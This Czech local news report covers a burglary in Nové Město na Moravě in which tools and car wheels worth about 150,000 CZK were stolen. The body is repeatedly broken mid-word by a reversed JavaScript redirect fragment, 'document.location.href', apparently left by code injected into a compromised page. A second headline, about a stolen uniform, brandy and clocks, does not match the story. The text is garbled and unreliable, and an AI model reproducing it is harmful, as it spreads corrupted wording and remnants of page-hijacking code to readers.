Rainbow page separator

Zloděj se vloupal do domu, ukradl tam nářadí za 150 tisíc

Neděle, 17. července 2022

Zloděj ukradl z rodinného domku uniformu, pálenku i hodiny

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Na více než s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to padesát tisíc korun byla vyčíslena škoda, kterou způsobil dosud neznámý zloděj, jenž si v minulých dnech vytipoval oplocený pozemek s objektem v novoměstské Petrovické ulici.
„Za užití násilí vnikl do objektu v době od soboty 9. července do dopoledních hodin úterý 12. července. Uvnitř otevřel plechový neuzamknutý kontejner, odkud odcizil vibrační desku, vibrační pěch, komplet kol na osobní au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomobil a další věci, čímž majiteli způsobil předběžnou škodu ve výši s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to padesát tisíc korun,“ informovala Michaela Lébrová z oddělení tisku a prevence krajského policejního ředitelství.
Přivolaní policisté na místě provedli ohledání, šetření a zadokumen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tování události. „V případu zahájili úkony trestního řízení pro podezření ze spáchání trestného činu krádeže. Případ nadále prověřují a po pachateli pátrají,“ doplnila Michaela Lébrová.